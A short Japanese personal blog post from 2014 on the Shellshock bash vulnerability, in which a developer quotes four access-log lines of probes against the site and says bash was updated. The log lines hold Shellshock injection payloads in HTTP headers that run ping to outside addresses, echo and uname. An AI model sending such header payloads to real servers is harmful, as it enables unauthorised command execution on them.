スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

bashの脆弱性

いま話題になっているbashの脆弱性ですが、
うちのサイトにも調査やら攻撃やらそれらしいアクセスがありました。


209.126.230.72 - - [25/Sep/2014:08:27:03 +0900] "GET / HTTP/1.0" 200 27471 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:16:26:23 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 301 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [26/Sep/2014:04:16:59 +0900] "GET / HTTP/1.1" 200 38 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
54.251.83.67 - - [26/Sep/2014:17:39:34 +0900] "GET / HTTP/1.1" 200 38 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"


うちのサイトでは、bashを直接、間接呼び出すことはない(はず)なので、大丈夫だったと思いますが、
bashはupdateしておきました。
こわいですね。

スポンサーサイト

コメントの投稿

非公開コメント

プロフィール

chattera.net

Author:chattera.net
フリーでソフト開発の仕事をしています。
自作したこのチャットシステムは、何か世の中に役に立つこともあるかと思いますので、お呼びがかかるとうれしいですね。

連絡先は chatteranet@gmail.com です。

また、ソフト開発関連のお誘いもうけたまわっております。

最新記事
最新コメント
最新トラックバック
月別アーカイブ
カテゴリ
検索フォーム
RSSリンクの表示
リンク
ブロとも申請フォーム

この人とブロともになる

QRコード
QR
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。